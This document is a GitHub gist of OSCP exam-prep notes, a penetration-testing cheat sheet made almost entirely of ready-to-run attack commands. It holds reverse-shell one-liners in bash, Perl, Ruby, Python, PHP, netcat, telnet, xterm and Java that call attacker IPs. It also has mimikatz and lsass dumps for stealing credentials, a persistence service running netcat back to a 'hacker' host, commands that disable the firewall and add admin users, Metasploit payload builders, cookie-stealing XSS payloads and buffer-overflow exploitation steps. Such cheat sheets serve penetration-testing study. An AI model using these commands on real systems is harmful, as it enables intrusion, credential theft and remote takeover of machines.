Skip to content

Instantly share code, notes, and snippets.

@c4ri0c4

c4ri0c4/OSCP note A'

Created January 3, 2018 00:21
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save c4ri0c4/38dea4fa153fda85653d19677329fbcb to your computer and use it in GitHub Desktop.
Save c4ri0c4/38dea4fa153fda85653d19677329fbcb to your computer and use it in GitHub Desktop.
Download ZIP
OSCP notes A & B may have some commons
Raw
OSCP note A'
OSCP Handy Commands
Nmap Full Web Vulnerable Scan:
mkdir /usr/share/nmap/scripts/vulscan
cd /usr/share/nmap/scrripts/vulscan
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
nmap -sS -sV –script=vulscan/vulscan.nse target
nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
nmap -PN -sS -sV –script=vulscan –script-args vulscancorrelation=1 -p80 target
nmap -sV –script=vuln target
nmap -PN -sS -sV –script=all –script-args vulscancorrelation=1 target
Dirb Directory Bruteforce:
dirb http://IP:PORT dirbuster-ng-master/wordlists/common.txt
Nikto Scanner:
nikto -C all -h http://IP
WordPress Scanner:
wpscan –url http://IP/ –enumerate p
Uniscan Scanning:
uniscan.pl -u target -qweds
HTTP Enumeration:
httprint -h http://www.example.com -s signatures.txt
SKIP Fish Scanner:
skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP
Uniscan Scanning:
uniscan –u http://www.hubbardbrook.org –qweds
Here, -q – Enable Directory checks
-w – Enable File Checks
-e – Enable robots.txt and sitemap.xml check
-d – Enable Dynamic checks
-s – Enable Static checks
Skipfish Scanning:
m-time threads -LVY donot update after result
skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP
Nmap Ports Scan:
1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
2)fargement
3)data packed – like orginal one not scan packet
4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target
5) nmap –source-port 53 target
nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)
nmap -Pn -T2 -sV –randomize-hosts IP1,IP2
nmap –script smb-check-vulns.nse -p445 target (using NSE scripts)
nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)
nmap -sA -PN -sN target
nmap -sS -sV -T5 -F -A -O target (version detection)
nmap -sU -v target (Udp)
nmap -sU -P0 (Udp)
nmap -sC 192.168.31.10-12 (all scan default)
Netcat Scanning:
nc -v -w 1 target -z 1-1000
for i in {10..12}; do nc -vv -n -w 1 192.168.34.$i 21-25 -z; done
US Scanning:
us -H -msf -Iv 192.168.31.20 -p 1-65535 && us -H -mU -Iv 192.168.31.20 -p 1-65535
Unicornscan Scanning:
unicornscan X.X.X.X:a -r10000 -v
Kernel Scanning:
xprobe2 -v -p tcp:80:open 192.168.6.66
Samba Enumeartion:
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U “” target
enum4linux target
SNMP ENumeration:
snmpget -v 1 -c public IP version
snmpwalk -v 1 -c public IP
snmpbulkwalk -v 2 -c public IP
Windows Useful commands:
net localgroup Users
net localgroup Administrators
search dir/s *.doc
system(“start cmd.exe /k $cmd”)
sc create microsoft_update binpath=”cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe” start= auto error= ignore
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords”
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe “sekurlsa::minidump lsass.dmp” “log” “sekurlsa::logonpasswords”
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits
Plink Tunnel:
plink.exe -P 22 -l root -pw “1234” -R 445:127.0.0.1:445 X.X.X.X
Enable RDP Access:
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
Turn Off Firewall:
netsh firewall set opmode disable
Meterpreter:
run getgui -u admin -p 1234
run vnc -p 5043
Add User Windows:
net user test 1234 /add
net localgroup administrators test /add
Mimikatz:
privilege::debug
sekurlsa::logonPasswords full
Passing the Hash:
pth-winexe -U hash //IP cmd
Password Cracking using Hashcat:
hashcat -m 400 -a 0 hash /root/rockyou.txt
Netcat commands:
c:> nc -l -p 31337
#nc 192.168.0.10 31337
c:> nc -v -w 30 -p 31337 -l < secret.txt
#nc -v -w 2 192.168.0.10 31337 > secret.txt
Banner Grabbing:
nc 192.168.0.10 80
GET / HTTP/1.1
Host: 192.168.0.10
User-Agent: SPOOFED-BROWSER
Referrer: K0NSP1RACY.COM
<enter>
<enter>
window reverse shell:
c:>nc -Lp 31337 -vv -e cmd.exe
nc 192.168.0.10 31337
c:>nc rogue.k0nsp1racy.com 80 -e cmd.exe
nc -lp 80
#nc -lp 31337 -e /bin/bash
nc 192.168.0.11 31337
nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000
Find all SUID root files:
find / -user root -perm -4000 -print
Find all SGID root files:
find / -group root -perm -2000 -print
Find all SUID and SGID files owned by anyone:
find / -perm -4000 -o -perm -2000 -print
Find all files that are not owned by any user:
find / -nouser -print
Find all files that are not owned by any group:
find / -nogroup -print
Find all symlinks and what they point to:
find / -type l -ls
Python:
python -c ‘import pty;pty.spawn(“/bin/bash”)’
python -m SimpleHTTPServer (Starting HTTP Server)
PID:
fuser -nv tcp 80 (list PID of process)
fuser -k -n tcp 80 (Kill Process of PID)
Hydra:
hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp (Self Explanatory)
Mount Remote Windows Share:
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
Compiling Exploit in Kali:
gcc -m32 -o output32 hello.c (32 bit)
gcc -o output hello.c (64 bit)
Compiling Windows Exploits on Kali:
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
NASM Command:
nasm -f bin -o payload.bin payload.asm
nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
SSH Pivoting:
ssh -D 127.0.0.1:1080 -p 22 user@IP
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains commands target
Pivoting to One Network to Another:
ssh -D 127.0.0.1:1080 -p 22 user1@IP1
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
proxychains commands target
Pivoting Using metasploit:
route add 10.1.1.0 255.255.255.0 1
route add 10.2.2.0 255.255.255.0 1
use auxiliary/server/socks4a
run
proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E
Exploit-DB search using CSV File:
searchsploit-rb –update
searchsploit-rb -t webapps -s WEBAPP
searchsploit-rb –search=”Linux Kernel”
searchsploit-rb -a “author name” -s “exploit name”
searchsploit-rb -t remote -s “exploit name”
searchsploit-rb -p linux -t local -s “exploit name”
For Privilege Escalation Exploit search:
cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep “<|<=” | sort -k3
Metasploit Payloads:
msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 X > system.exe
msfpayload php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R > exploit.php
msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R | msfencode -t asp -o file.asp
msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x00″ -t c
Create a Linux Reverse Meterpreter Binary
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell
Create Reverse Shell (Shellcode)
msfpayload windows/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -b “\x00\x0a\x0d”
Create a Reverse Shell Python Script
msfpayload cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.py
Create a Reverse ASP Shell
msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t asp -o shell.asp
Create a Reverse Bash Shell
msfpayload cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.sh
Create a Reverse PHP Shell
msfpayload php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.php
Edit shell.php in a text editor to add <?php at the beginning.
Create a Windows Reverse Meterpreter Binary
msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X >shell.exe
Security Commands In Linux:
find programs with a set uid bit
# find / -uid 0 -perm -4000
find things that are world writable
# find / -perm -o=w
find names with dots and spaces, there shouldn’t be any
# find / -name ” ” -print
# find / -name “..” -print
# find / -name “. ” -print
# find / -name ” ” -print
find files that are not owned by anyone
# find / -nouser
look for files that are unlinked
# lsof +L1
get information about procceses with open ports
# lsof -i
look for weird things in arp
# arp -a
look at all accounts including AD
# getent passwd
look at all groups and membership including AD
# getent group
list crontabs for all users including AD
# for user in $(getent passwd|cut -f1 -d:); do echo “### Crontabs for $user ####”; crontab -u $user -l; done
#generate random passwords
cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4
# find all immutable files, there should not be any
find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’
# fix immutable files
chattr -i file
Windows Buffer Overflow Exploitation Commands:
msfpayload windows/shell_bind_tcp R | msfencode -a x86 -b “\x00″ -t c
msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x00″ -t c
COMMONLY USED BAD CHARACTERS:
\x00\x0a\x0d\x20 For http request
\x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_)
Useful Commands:
pattern create
pattern offset (EIP Address)
pattern offset (ESP Address)
add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )
!pvefindaddr pattern_create 5000
!pvefindaddr suggest
!pvefindaddr modules
!pvefindaddr nosafeseh
!mona config -set workingfolder C:\Mona\%p
!mona config -get workingfolder
!mona mod
!mona bytearray -b “\x00\x0a”
!mona pc 5000
!mona po EIP
!mona suggest
SEH:
!mona suggest
!mona nosafeseh
nseh=”\xeb\x06\x90\x90″ (next seh chain)
iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)
ROP (DEP):
!mona modules
!mona ropfunc -m *.dll -cpb “\x00\x09\x0a’
!mona rop -m *.dll -cpb “\x00\x09\x0a’ (auto suggest)
ASLR:
!mona noaslr
EGG Hunter:
!mona jmp -r esp
!mona egg -t lxxl
\xeb\xc4 (jump backward -60)
buff=lxxllxxl+shell
!mona egg -t ‘w00t’
GDB Debugger Commands:
Setting Breakpoint :
break *_start
Execute Next Instruction :
next
step
n
s
Continue Execution :
continue
c
Data :
checking ‘REGISTERS’ and ‘MEMORY’
Display Register Values : (Decimal , Binary , Hex )
print /d –> Decimal
print /t –> Binary
print /x –> Hex
O/P :
(gdb) print /d $eax
$17 = 13
(gdb) print /t $eax
$18 = 1101
(gdb) print /x $eax
$19 = 0xd
(gdb)
Display values of specific memory locations :
command : x/nyz (Examine)
n –> Number of fields to display ==>
y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)
Cheat Codes:
Reverse Shellcode:
BASH:
bash -i >& /dev/tcp/192.168.23.10/443 0>&1
exec /bin/bash 0&0 2>&0
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done
/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
/bin/bash -i > /dev/tcp/192.168.23.10/443 0<&1 2>&1
PERL:
Shorter Perl reverse shell that does not depend on /bin/sh:
perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
If the target system is running Windows use the following one-liner:
perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
RUBY:
Longer Ruby reverse shell that does not depend on /bin/sh:
ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
If the target system is running Windows use the following one-liner:
ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
PYTHON:
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
PHP:
This code assumes that the TCP connection uses file descriptor 3.
php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’
php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’
If you would like a PHP reverse shell to download, try this link on pentestmonkey.net -> LINK
NETCAT:
Other possible Netcat reverse shells, depending on the Netcat version and compilation flags:
nc -e /bin/sh attackerip 4444
nc -e /bin/sh 192.168.37.10 443
If the -e option is disabled, try this
mknod backpipe p && nc 192.168.23.10 443 0<backpipe | /bin/bash 1>backpipe
mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe
/bin/sh | nc attackerip 4444
/bin/sh | nc 192.168.23.10 443
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/
rm -f /tmp/p; mknod /tmp/p p && nc 192.168.23.10 444 0/tmp/
If you have the wrong version of netcat installed, try
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.10 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
TELNET:
If netcat is not available or /dev/tcp
mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe
mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe
XTERM:
Xterm is the best..
To catch incoming xterm, start an open X Server on your system (:1 – which listens on TCP port 6001). One way to do this is with Xnest: It is available on Ubuntu.
Xnest :1 # Note: The command starts with uppercase X
Xnest :1 # Note: The command starts with uppercase X
Then remember to authorise on your system the target IP to connect to you:
xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab xhost +targetip # Run this INSIDE the spawned xterm on the open X Server
xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab
xhost +targetip # Run this INSIDE the spawned xterm on the open X Server
If you want anyone to connect to this spawned xterm try:
xhost + # Run this INSIDE the spawned xterm on the open X Server
xhost + # Run this INSIDE the spawned xterm on the open X Server
Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:
xterm -display attackerip:1
xterm -display attackerip:1
Or:
$ DISPLAY=attackerip:0 xterm
$ DISPLAY=attackerip:0 xterm
It will try to connect back to you, attackerip, on TCP port 6001.
Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath:
/usr/openwin/bin/xterm -display attackerip:1
/usr/openwin/bin/xterm -display attackerip:1
PHP:
php -r ‘$sock=fsockopen(“192.168.0.100″,4444);exec(“/bin/sh -i <&3 >&3 2>&3″);’
JAVA:
r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.0.100/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
p.waitFor()
XSS Cheat Codes:
(“< iframes > src=http://IP:PORT </ iframes >”)
<script>document.location=http://IP:PORT</script>
‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
”;!–“<XSS>=&amp;amp;{()}
<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=javascript:alert(‘XSS’)>
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
<IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;>
<IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041>
<IMG SRC=”jav ascript:alert(‘XSS’);”>
perl -e ‘print “<IMG SRC=javascript:alert(\”XSS\”)>”;’ > out
<BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
( “>< iframes http://google.de < iframes >)
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
“><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
<img src=asdf onerror=alert(document.cookie)>
Useful Links To Read and Learn:
Enumeration:
http://www.0daysecurity.com/penetration-testing/enumeration.html
Windows Shellcode:
http://farlight.org/index.html?type=shellcode
http://shell-storm.org/shellcode/
http://www.windowsexploits.com/
XSS Cheat Codes:
http://www.xenuser.org/xss-cheat-sheet/
https://gist.github.com/sseffa/11031135
https://html5sec.org/
Reverse Shell Cheat Codes:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
http://roo7break.co.uk/?p=215
Webshells:
http://www.r57shell.net/
Nikto Tutorial:
http://www.unixmen.com/install-nikto-web-scanner-check-vulnerabilities/
Exploit-db:
wget http://exploit-db.com/archive.tar.bz2
SNMP Enumeration:
http://www.webpronews.com/snmp-enumeration-and-hacking-2003-09
http://carnal0wnage.attackresearch.com/2007/07/over-in-lso-chat-we-were-talking-about.html
SAMBA Enumeration:
http://www.iodigitalsec.com/windows-null-session-enumeration/
http://pen-testing.sans.org/blog/2013/07/24/plundering-windows-account-info-via-authenticated-smb-sessions
http://carnal0wnage.attackresearch.com/2007/07/enumerating-user-accounts-on-linux-and.html
http://www.madirish.net/59
Passhing The Hash:
https://www.kali.org/penetration-testing/passing-hash-remote-desktop/
https://www.kali.org/kali-monday/pass-the-hash-toolkit-winexe-updates/
Hashcat Tutorial:
http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-3-using-hashcat-0156543/
Wordlist Download:
https://wiki.skullsecurity.org/Passwords
http://hqsoftwarecollection.blogspot.in/p/36gn-wordlist.html
NASM Tutorial:
http://en.kioskea.net/faq/1559-compiling-an-assembly-program-with-nasm
Buffer overflow Tutorial:
I consider this as intermediate and focus more on the real application exploit. Lupin from The Grey Corner explains exploit from basic to intermediate level with step by step debugging.
Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html
SEH Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html
Windows Buffer Overflow Tutorial: Dealing with Character Translation – http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html
Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability – http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html
Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump – http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html
ADVANCED:
Peter Van Eeckhoutte is the first one who started this exploit tutorial (at least he is the first one who has provided most comprehensive guides on exploit development and keeps updating from time to time that I have ever seen).
Exploit writting tutorial part 1:Stack Based Overflows – http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
Exploit writting tutorial part 2: Stack Based Overflows – jumping to shellcode – http://www.corelan.be:8800/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/
Exploit writting tutorial part 3: SEH Based Exploits – http://www.corelan.be:8800/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
Exploit writting tutorial part 3b: SEH Based Exploits – just another example – http://www.corelan.be:8800/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
Exploit writting tutorial part 4: From Exploit to Metasploit – The basics – http://www.corelan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/
Exploit writting tutorial part 5: How debugger modules & plugins can speed up basic exploit development – http://www.corelan.be:8800/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/
Exploit writting tutorial part 6: Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR – http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/
Exploit writting tutorial part 7: Unicode – from 0x00410041 to calc – http://www.corelan.be:8800/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
Exploit writting tutorial part 8: Win32 Egg Hunting – http://www.corelan.be:8800/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
Exploit writting tutorial part 9: Introduction to Win32 shellcoding – http://www.corelan.be:8800/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/
SQL Injection Cheat Codes:
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
http://resources.infosecinstitute.com/backdoor-sql-injection/
RFI/LFI Tutorials:
https://evilzone.org/tutorials/remote-file-inclusion%28rfi%29/
http://www.hackersonlineclub.com/lfi-rfi
https://0xzoidberg.wordpress.com/category/security/lfi-rfi/
NMAP Vulsan:
http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz
Online Hash Cracking:
http://www.objectif-securite.ch/
Dump Windows Password Hashes:
http://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html
Windows Previlige Escalation:
http://it-ovid.blogspot.in/2012/02/windows-privilege-escalation.html
http://www.fuzzysecurity.com/tutorials/16.html
Linux Previlige Escalation:
http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html
http://pentestmonkey.net/tools/audit/unix-privesc-check
http://www.rebootuser.com/?p=1758
Tunneling & Port Forwarding:
http://magikh0e.ihtb.org/pubPapers/ssh_gymnastics_tunneling.html (Very Good)
http://www.debianadmin.com/howto-use-ssh-local-and-remote-port-forwarding.html
http://www.danscourses.com/Network-Penetration-Testing/metasploit-pivoting.html
http://carnal0wnage.attackresearch.com/2007/09/using-metasploit-to-pivot-through_06.html
http://www.offensive-security.com/metasploit-unleashed/Portfwd
http://www.offensive-security.com/metasploit-unleashed/Pivoting
http://www.howtoforge.com/reverse-ssh-tunneling
http://ftp.acc.umu.se/pub/putty/putty-0.57/htmldoc/Chapter7.html (Plink)
http://www.offensive-security.com/metasploit-unleashed/Msfvenom
Useful Links:
http://www.fuzzysecurity.com/tutorials.html – Exploit tutorials
https://www.corelan.be/index.php/articles/ – Exploit tutorials
http://www.securitytube.net/ – Training videos
http://www.offensive-security.com/blog/ – Offensive Security blog
http://blog.g0tmi1k.com/ – Security blog
http://carnal0wnage.attackresearch.com
http://cybershakti.my3gb.com/
http://www.offensive-security.com/metasploit-unleashed/Introduction
http://www.securityfocus.com/
http://www.exploit-db.com/
http://nmap.org/nsedoc/
http://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
http://www.fuzzysecurity.com/tutorials/16.html
http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
http://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf
http://pentestmonkey.net/tools/audit/unix-privesc-check
http://pentestmonkey.net/tools/windows-privesc-check
Videos:
http://www.securitytube.net/
http://www.rmccurdy.com/scripts/videos/ (milliworm exploit tutorial)
http://www.cs.fsu.edu/~redwood/OffensiveSecurity/lectures.html (Offensive Secuirty Lectures)
Privilege Escalation in Windows:
http://www.youtube.com/watch?v=kMG8IsCohHA Encyclopaedia Of Windows Privilege Escalation – Brett Moore
http://www.youtube.com/watch?v=_8xJaaQlpBo DerbyCon 3 0 2105 Windows Attacks At Is The New Black Rob Fuller And Chris Gates
http://www.greyhathacker.net/?p=738 Elevating privileges by exploiting weak folder permissions
Buffer Overflow Tutorial:
http://www.frequency.com/video/athcon-hack-in-paris-demo-1/40181156
http://www.savevid.com/video/athcon-hack-in-paris-demo-2.html
http://www.frequency.com/video/athcon-hack-in-paris-demo-3/11306148
https://www.youtube.com/watch?v=ANlROJNWtCs&list=PLM0IiVYClP2vC3A6Uz_ESV86kBVYei5qx (Python Penetration Testing)
https://www.youtube.com/watch?v=Sye3mu-EoTI (Bash Scripting by Peter Chubb)
https://www.youtube.com/watch?v=GPjcSxyIIUc (BASH Scripting by Lee Baird )
https://www.youtube.com/watch?v=kPxavpgos2I (LFI/RFI)
https://www.youtube.com/watch?v=pnqcHU2qFiA (LFI/RFI)
http://www.securitytube.net/video/7640 (Simple buffer overflow)
https://www.youtube.com/watch?v=y2zrEAwmdws (Mona.py)
http://www.securitytube.net/video/7735 (Avoiding bad characters)
PDF:
https://www.yumpu.com/en/document/view/14963680/from-sqli-to-shell (SQL Injection)
https://cyberwar.nl/d/hak5.org_LinuxUnixBSDPost-ExploitationCommandList_copy-20130228.pdf (Linux Unix Post Exploitation Command)
http://www.scribd.com/doc/245679444/hak5-org-OSXPost-Exploitation-copy-20130228-pdf#scribd (Post Exploitation Command List)
http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf (Netcat)
